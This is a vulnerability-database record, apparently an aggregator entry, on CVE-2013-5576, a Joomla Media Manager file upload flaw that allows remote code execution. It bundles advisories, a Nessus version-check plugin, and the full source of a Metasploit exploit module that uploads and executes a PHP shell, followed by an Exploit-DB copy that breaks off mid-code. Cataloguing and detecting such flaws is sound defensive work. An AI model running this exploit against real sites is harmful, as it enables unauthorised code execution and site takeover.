{"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-5576"]}, {"type": "dsquare", "idList": ["E-333", "E-334"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/WEBAPP/JOOMLA_MEDIA_UPLOAD_EXEC"]}, {"type": "exploitdb", "idList": ["EDB-ID:27610"]}, {"type": "cert", "idList": ["VU:639620"]}, {"type": "nessus", "idList": ["JOOMLA_2514.NASL"]}], "modified": "2019-05-29T19:48:20", "rev": 2}, "score": {"value": 6.7, "vector": "NONE", "modified": "2019-05-29T19:48:20", "rev": 2}, "vulnersScore": 6.7}, "published": "2013-10-09T14:54:00", "id": "JOOMLA_MM_RCE", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "edition": 2, "bulletinFamily": "exploit", "viewCount": 13, "cvelist": ["CVE-2013-5576"], "modified": "2013-10-09T14:54:00", "references": [], "description": "**Name**| joomla_mm_rce \n---|--- \n**CVE**| CVE-2013-5576 \n**Exploit Pack**| [CANVAS](<http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| joomla_mm_rce \n**Notes**| Repeatability: Infinite \nNotes: \n \nThis module was tested against Joomla 3.1.4 on Windows 7. \n \nDepending on the configuration of the site, this module may require valid \ncredentials in order to exploit the file upload vulnerability. \n \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5576 \nVENDOR: Joomla \nCVE Name: CVE-2013-5576 \n\n", "type": "canvas", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/joomla_mm_rce", "lastseen": "2019-05-29T19:48:20", "reporter": "Immunity Canvas", "title": "Immunity Canvas: JOOMLA_MM_RCE", "scheme": null}
{"cve": [{"lastseen": "2020-10-03T12:46:06", "description": "administrator/components/com_media/helpers/media.php in the media manager in Joomla! 2.5.x before 2.5.14 and 3.x before 3.1.5 allows remote authenticated users or remote attackers to bypass intended access restrictions and upload files with dangerous extensions via a filename with a trailing . (dot), as exploited in the wild in August 2013.", "edition": 3, "cvss3": {}, "published": "2013-10-09T14:54:00", "title": "CVE-2013-5576", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5576"], "modified": "2013-12-01T04:31:00", "cpe": ["cpe:/a:joomla:joomla\\!:2.5.1", "cpe:/a:joomla:joomla\\!:3.0.0", "cpe:/a:joomla:joomla\\!:2.5.10", "cpe:/a:joomla:joomla\\!:3.0.3", "cpe:/a:joomla:joomla\\!:2.5.11", "cpe:/a:joomla:joomla\\!:3.1.4", "cpe:/a:joomla:joomla\\!:2.5.4", "cpe:/a:joomla:joomla\\!:2.5.3", "cpe:/a:joomla:joomla\\!:3.1.2", "cpe:/a:joomla:joomla\\!:2.5.2", "cpe:/a:joomla:joomla\\!:2.5.13", "cpe:/a:joomla:joomla\\!:2.5.12", "cpe:/a:joomla:joomla\\!:3.1.0", "cpe:/a:joomla:joomla\\!:2.5.6", "cpe:/a:joomla:joomla\\!:3.1.1", "cpe:/a:joomla:joomla\\!:3.0.4", "cpe:/a:joomla:joomla\\!:2.5.9", "cpe:/a:joomla:joomla\\!:3.1.3", "cpe:/a:joomla:joomla\\!:2.5.8", "cpe:/a:joomla:joomla\\!:2.5.0", "cpe:/a:joomla:joomla\\!:3.0.2", "cpe:/a:joomla:joomla\\!:2.5.7", "cpe:/a:joomla:joomla\\!:2.5.5", "cpe:/a:joomla:joomla\\!:3.0.1"], "id": "CVE-2013-5576", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5576", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:joomla:joomla\\!:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.13:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.12:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.10:*:*:*:*:*:*:*"]}], "dsquare": [{"lastseen": "2019-05-29T15:31:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-5576"], "description": "File upload vulnerability in Joomla Media Manager\n\nVulnerability Type: File Upload", "modified": "2013-08-21T00:00:00", "published": "2013-08-21T00:00:00", "id": "E-333", "href": "", "type": "dsquare", "title": "Joomla 2.5.13 & 3.1.4 File Upload", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T15:31:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-5576"], "description": "File upload 
vulnerability in Joomla Media Manager\n\nVulnerability Type: File Upload", "modified": "2013-08-21T00:00:00", "published": "2013-08-21T00:00:00", "id": "E-334", "href": "", "type": "dsquare", "title": "Joomla 1.5.26 File Upload", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2020-09-18T20:41:53", "bulletinFamily": "info", "cvelist": ["CVE-2013-5576"], "description": "### Overview \n\nAn authenticated attacker may be able to upload active content to websites running older versions of Joomla.\n\n### Description \n\n[**CWE-434**](<http://cwe.mitre.org/data/definitions/434.html>)**: Unrestricted Upload of File with Dangerous Type**\n\nA vulnerability has been discovered in older versions of the Joomla! content management software that allows an authenticated attacker to upload active content through the media manager form ('administrator/components/com_media/helpers/media.php'). Joomla! allows files whose names have a trailing '.' to pass the upload checks. \n \nThis active content could potentially give an attacker control over the site or serve malicious code to visitors of the site. \n \nJoomla versions 1.6 and greater allow site owners to grant public access to the media manager. For versions 1.5 and greater, the default configuration of Joomla only allows privileged users to access the media manager form. We do not know whether versions earlier than 1.5 are affected. We will update this note as we become aware of more information. \n \nAccording to an [advisory](<http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads>) by the Joomla Security Center, the following versions are affected:\n\n * 2.5.13 and earlier 2.5.x versions\n * 3.1.4 and earlier 3.x versions \n--- \n \n### Impact \n\nThe complete impact of this vulnerability is not yet known. 
\n \n--- \n \n### Solution \n\n**Apply an Update** \nUpdate to versions 2.5.14 or 3.1.5 or greater. In addition, please consider the following workarounds: \n \n--- \n \n**Restrict Access** \n \nApply the appropriate access controls to ensure that only authorized users may access the media manager. \n \n--- \n \n### Vendor Information\n\n639620\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Joomla Affected\n\nUpdated: October 30, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 8.5 | AV:N/AC:M/Au:S/C:C/I:C/A:C \nTemporal | 6.7 | E:POC/RL:OF/RC:C \nEnvironmental | 5.3 | CDP:L/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://osvdb.org/show/osvdb/95933>\n * <http://developer.joomla.org/security/563-20130801-core-unauthorised-uploads.html>\n * [http://joomlacode.org/gf/project/joomla/tracker/?action=TrackerItemEdit&%20tracker_item_id=31626](<http://joomlacode.org/gf/project/joomla/tracker/?action=TrackerItemEdit&%20tracker_item_id=31626>)\n * <https://github.com/joomla/joomla-cms/commit/fa5645208eefd70f521cd2e4d53d5378622133d8>\n * <http://niiconsulting.com/checkmate/2013/08/critical-joomla-file-upload-vulnerability/>\n * <http://www.exploit-db.com/exploits/27610/>\n * <http://blog.sucuri.net/2013/08/joomla-media-manager-attacks-in-the-wild.html>\n * <http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/>\n\n### Acknowledgements\n\nThanks to Versafe for reporting this vulnerability.\n\nThis document was written by Todd Lewellen.\n\n### Other Information\n\n**CVE IDs:** | 
[CVE-2013-5576](<http://web.nvd.nist.gov/vuln/detail/CVE-2013-5576>) \n---|--- \n**Date Public:** | 2013-07-31 \n**Date First Published:** | 2013-10-30 \n**Date Last Updated: ** | 2013-10-30 15:40 UTC \n**Document Revision: ** | 16 \n", "modified": "2013-10-30T15:40:00", "published": "2013-10-30T00:00:00", "id": "VU:639620", "href": "https://www.kb.cert.org/vuls/id/639620", "type": "cert", "title": "Joomla! Media Manager allows arbitrary file upload and execution", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-01T03:19:20", "description": "According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is 2.5.x prior to 2.5.14\nor 3.x prior to 3.1.5. It is, therefore, affected by a remote code\nexecution vulnerability due to a failure by the\nadministrator/components/com_media/helpers/media.php script to\nproperly validate the extension of an uploaded file. This allows files\nwith '.php.' extensions to be uploaded and placed in a user-accessible\npath. An attacker can exploit this issue, via a direct request to such\nan uploaded file, to execute arbitrary PHP code with the privileges of\nthe web server.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 30, "cvss3": {"score": 6.3, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"}, "published": "2013-08-08T00:00:00", "title": "Joomla! 2.5.x < 2.5.14 / 3.x < 3.1.5 .php. 
File Upload RCE", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-5576"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:joomla:joomla\\!"], "id": "JOOMLA_2514.NASL", "href": "https://www.tenable.com/plugins/nessus/69273", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69273);\n script_version(\"1.27\");\n script_cvs_date(\"Date: 2019/11/27\");\n\n script_cve_id(\"CVE-2013-5576\");\n script_bugtraq_id(61582);\n script_xref(name:\"CERT\", value:\"639620\");\n\n script_name(english:\"Joomla! 2.5.x < 2.5.14 / 3.x < 3.1.5 .php. File Upload RCE\");\n script_summary(english:\"Checks the version of Joomla!.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is 2.5.x prior to 2.5.14\nor 3.x prior to 3.1.5. It is, therefore, affected by a remote code\nexecution vulnerability due to a failure by the\nadministrator/components/com_media/helpers/media.php script to\nproperly validate the extension of an uploaded file. This allows files\nwith '.php.' extensions to be uploaded and placed in a user-accessible\npath. 
An attacker can exploit this issue, via a direct request to such\nan uploaded file, to execute arbitrary PHP code with the privileges of\nthe web server.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?01c258b2\");\n # https://www.joomla.org/announcements/release-news/5506-joomla-2-5-14-released.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3653e23d\");\n # https://www.joomla.org/announcements/release-news/5505-joomla-3-1-5-stable-released.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7f239a18\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Joomla! version 2.5.14 / 3.1.5 or later. Alternatively,\napply the patch referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-5576\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Joomla 2.5.13 & 3.1.4 File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Joomla Media Manager File Upload Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n 
script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/08/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/08/08\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla\\!\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"joomla_detect.nasl\");\n script_require_keys(\"installed_sw/Joomla!\", \"www/PHP\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Joomla!\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nversion = install['version'];\ninstall_loc = build_url(port:port, qs:install['path']);\n\nfix = \"2.5.14 / 3.1.5\";\n\n# Check granularity\nif (version =~ \"^2(\\.5)?$\" || version =~ \"^3(\\.1)?$\")\n audit(AUDIT_VER_NOT_GRANULAR, app, port, version);\n\n# Versions 2.5.x < 2.5.14 and 3.x < 3.1.5 are vulnerable\nif (\n version =~ \"^2\\.5($|\\.([0-9]|1([0-3]))($|[^0-9]))\" ||\n version =~ \"^3\\.0($|[^0-9])\" ||\n version =~ \"^3\\.1($|\\.[0-4]($|[^0-9]))\"\n)\n{\n order = make_list(\"URL\", \"Installed version\", \"Fixed version\");\n report = make_array(\n order[0], install_loc,\n 
order[1], version,\n order[2], fix\n );\n report = report_items_str(report_items:report, ordered_fields:order);\n\n security_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\n exit(0);\n}\naudit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_loc, version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-10-12T22:37:31", "description": "This module exploits a vulnerability found in Joomla 2.5.x up to 2.5.13, as well as 3.x up to 3.1.4 versions. The vulnerability exists in the Media Manager component, which comes by default in Joomla, allowing arbitrary file uploads, and results in arbitrary code execution. The module has been tested successfully on Joomla 2.5.13 and 3.1.4 on Ubuntu 10.04. Note: If public access isn't allowed to the Media Manager, you will need to supply a valid username and password (Editor role or higher) in order to work properly.\n", "published": "2013-08-13T21:27:27", "type": "metasploit", "title": "Joomla Media Manager File Upload Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-5576"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/UNIX/WEBAPP/JOOMLA_MEDIA_UPLOAD_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Joomla Media Manager File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Joomla 2.5.x up to 2.5.13, as well as\n 3.x up to 3.1.4 versions. The vulnerability exists in the Media Manager component,\n which comes by default in Joomla, allowing arbitrary file uploads, and results in\n arbitrary code execution. 
The module has been tested successfully on Joomla 2.5.13\n and 3.1.4 on Ubuntu 10.04. Note: If public access isn't allowed to the Media\n Manager, you will need to supply a valid username and password (Editor role or\n higher) in order to work properly.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Jens Hinrichsen', # Vulnerability discovery according to the OSVDB\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-5576' ],\n [ 'OSVDB', '95933' ],\n [ 'URL', 'http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads' ],\n [ 'URL', 'http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/' ],\n [ 'URL', 'https://github.com/joomla/joomla-cms/commit/fa5645208eefd70f521cd2e4d53d5378622133d8' ],\n [ 'URL', 'http://niiconsulting.com/checkmate/2013/08/critical-joomla-file-upload-vulnerability/' ],\n [ 'URL', 'https://blog.rapid7.com/2013/08/15/time-to-patch-joomla' ]\n ],\n 'Payload' =>\n {\n 'DisableNops' => true,\n # Arbitrary big number. 
The payload gets sent as POST data, so\n # really it's unlimited\n 'Space' => 262144, # 256k\n },\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n [ 'Joomla 2.5.x <=2.5.13 / Joomla 3.x <=3.1.4', {} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2013-08-01',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),\n OptString.new('USERNAME', [true, 'User to login with', '']),\n OptString.new('PASSWORD', [true, 'Password to login with', '']),\n ])\n\n end\n\n def check\n res = get_upload_form\n\n if res and (res.code == 200 or res.code == 302)\n if res.body =~ /You are not authorised to view this resource/\n vprint_status(\"Joomla Media Manager Found but authentication required\")\n return Exploit::CheckCode::Detected\n elsif res.body =~ /<form action=\"(.*)\" id=\"uploadForm\"/\n vprint_status(\"Joomla Media Manager Found and authentication isn't required\")\n return Exploit::CheckCode::Detected\n end\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def upload(upload_uri)\n begin\n u = URI(upload_uri)\n rescue ::URI::InvalidURIError\n fail_with(Failure::Unknown, \"Unable to get the upload_uri correctly\")\n end\n\n data = Rex::MIME::Message.new\n data.add_part(payload.encoded, \"application/x-php\", nil, \"form-data; name=\\\"Filedata[]\\\"; filename=\\\"#{@upload_name}.\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => \"#{u.path}?#{u.query}\",\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'cookie' => @cookies,\n 'vars_get' => {\n 'asset' => 'com_content',\n 'author' => '',\n 'format' => '',\n 'view' => 'images',\n 'folder' => ''\n },\n 'data' => post_data\n })\n\n return res\n\n end\n\n def get_upload_form\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, \"index.php\"),\n 'cookie' => @cookies,\n 'encode_params' => false,\n 'vars_get' => {\n 'option' => 
'com_media',\n 'view' => 'images',\n 'e_name' => 'jform_articletext',\n 'asset' => 'com_content',\n 'author' => ''\n }\n })\n\n return res\n end\n\n def get_login_form\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, \"index.php\", \"component\", \"users\", \"/\"),\n 'cookie' => @cookies,\n 'vars_get' => {\n 'view' => 'login'\n }\n })\n\n return res\n\n end\n\n def login\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, \"index.php\", \"component\", \"users\", \"/\"),\n 'cookie' => @cookies,\n 'vars_get' => {\n 'task' => 'user.login'\n },\n 'vars_post' => {\n 'username' => @username,\n 'password' => @password\n }.merge(@login_options)\n })\n\n return res\n end\n\n def parse_login_options(html)\n html.scan(/<input type=\"hidden\" name=\"(.*)\" value=\"(.*)\" \\/>/) {|option|\n @login_options[option[0]] = option[1] if option[1] == \"1\" # Searching for the Token Parameter, which always has value \"1\"\n }\n end\n\n def exploit\n @login_options = {}\n @cookies = \"\"\n @upload_name = \"#{rand_text_alpha(rand(5) + 3)}.php\"\n @username = datastore['USERNAME']\n @password = datastore['PASSWORD']\n\n print_status(\"Checking Access to Media Component...\")\n res = get_upload_form\n\n if res and (res.code == 200 or res.code == 302) and !res.get_cookies.empty? and res.body =~ /You are not authorised to view this resource/\n print_status(\"Authentication required... Proceeding...\")\n\n if @username.empty? or @password.empty?\n fail_with(Failure::BadConfig, \"#{peer} - Authentication is required to access the Media Manager Component, please provide credentials\")\n end\n @cookies = res.get_cookies.sub(/;$/, \"\")\n\n print_status(\"Accessing the Login Form...\")\n res = get_login_form\n if res.nil? 
or (res.code != 200 and res.code != 302) or res.body !~ /login/\n fail_with(Failure::Unknown, \"#{peer} - Unable to Access the Login Form\")\n end\n parse_login_options(res.body)\n\n res = login\n if not res or res.code != 303\n fail_with(Failure::NoAccess, \"#{peer} - Unable to Authenticate\")\n end\n elsif res and (res.code == 200 or res.code == 302) and !res.get_cookies.empty? and res.body =~ /<form action=\"(.*)\" id=\"uploadForm\"/\n print_status(\"Authentication isn't required.... Proceeding...\")\n @cookies = res.get_cookies.sub(/;$/, \"\")\n else\n fail_with(Failure::UnexpectedReply, \"#{peer} - Failed to Access the Media Manager Component\")\n end\n\n print_status(\"Accessing the Upload Form...\")\n res = get_upload_form\n\n if res and (res.code == 200 or res.code == 302) and res.body =~ /<form action=\"(.*)\" id=\"uploadForm\"/\n upload_uri = Rex::Text.html_decode($1)\n else\n fail_with(Failure::Unknown, \"#{peer} - Unable to Access the Upload Form\")\n end\n\n print_status(\"Uploading shell...\")\n\n res = upload(upload_uri)\n\n if res.nil? or res.code != 200\n fail_with(Failure::Unknown, \"#{peer} - Upload failed\")\n end\n\n register_files_for_cleanup(\"#{@upload_name}.\")\n print_status(\"Executing shell...\")\n send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, \"images\", @upload_name),\n })\n\n end\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/joomla_media_upload_exec.rb"}], "exploitdb": [{"lastseen": "2016-02-03T06:19:49", "description": "Joomla Media Manager File Upload Vulnerability. CVE-2013-5576. 
Remote exploit for php platform", "published": "2013-08-15T00:00:00", "type": "exploitdb", "title": "Joomla Media Manager File Upload Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-5576"], "modified": "2013-08-15T00:00:00", "id": "EDB-ID:27610", "href": "https://www.exploit-db.com/exploits/27610/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Joomla Media Manager File Upload Vulnerability\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Joomla 2.5.x up to 2.5.13, as well as\r\n 3.x up to 3.1.4 versions. The vulnerability exists in the Media Manager component,\r\n which comes by default in Joomla, allowing arbitrary file uploads, and results in\r\n arbitrary code execution. The module has been tested successfully on Joomla 2.5.13\r\n and 3.1.4 on Ubuntu 10.04. 
Note: If public access isn't allowed to the Media\r\n Manager, you will need to supply a valid username and password (Editor role or\r\n higher) in order to work properly.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Jens Hinrichsen', # Vulnerability discovery according to the OSVDB\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'OSVDB', '95933' ],\r\n [ 'URL', 'http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads' ],\r\n [ 'URL', 'http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/' ],\r\n [ 'URL', 'https://github.com/joomla/joomla-cms/commit/fa5645208eefd70f521cd2e4d53d5378622133d8' ],\r\n [ 'URL', 'http://niiconsulting.com/checkmate/2013/08/critical-joomla-file-upload-vulnerability/' ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n # Arbitrary big number. The payload gets sent as POST data, so\r\n # really it's unlimited\r\n 'Space' => 262144, # 256k\r\n },\r\n 'Platform' => ['php'],\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [ 'Joomla 2.5.x <=2.5.13', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Aug 01 2013\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),\r\n OptString.new('USERNAME', [false, 'User to login with', '']),\r\n OptString.new('PASSWORD', [false, 'Password to login with', '']),\r\n ], self.class)\r\n\r\n end\r\n\r\n def peer\r\n return \"#{rhost}:#{rport}\"\r\n end\r\n\r\n def check\r\n res = get_upload_form\r\n\r\n if res and res.code == 200\r\n if res.body =~ /You are not authorised to view this resource/\r\n print_status(\"#{peer} - Joomla Media Manager Found but authentication required\")\r\n return Exploit::CheckCode::Detected\r\n elsif res.body =~ /<form action=\"(.*)\" id=\"uploadForm\"/\r\n print_status(\"#{peer} - Joomla Media Manager Found and authentication isn't 
required\")\r\n return Exploit::CheckCode::Detected\r\n end\r\n end\r\n\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def upload(upload_uri)\r\n begin\r\n u = URI(upload_uri)\r\n rescue ::URI::InvalidURIError\r\n fail_with(Exploit::Failure::Unknown, \"Unable to get the upload_uri correctly\")\r\n end\r\n\r\n data = Rex::MIME::Message.new\r\n data.add_part(payload.encoded, \"application/x-php\", nil, \"form-data; name=\\\"Filedata[]\\\"; filename=\\\"#{@upload_name}.\\\"\")\r\n post_data = data.to_s.gsub(/^\\r\\n\\-\\-\\_Part\\_/, '--_Part_')\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => \"#{u.path}?#{u.query}\",\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'cookie' => @cookies,\r\n 'vars_get' => {\r\n 'asset' => 'com_content',\r\n 'author' => '',\r\n 'format' => '',\r\n 'view' => 'images',\r\n 'folder' => ''\r\n },\r\n 'data' => post_data\r\n })\r\n\r\n return res\r\n\r\n end\r\n\r\n def get_upload_form\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, \"index.php\"),\r\n 'cookie' => @cookies,\r\n 'encode_params' => false,\r\n 'vars_get' => {\r\n 'option' => 'com_media',\r\n 'view' => 'images',\r\n 'tmpl' => 'component',\r\n 'e_name' => 'jform_articletext',\r\n 'asset' => 'com_content',\r\n 'author' => ''\r\n }\r\n })\r\n\r\n return res\r\n end\r\n\r\n def 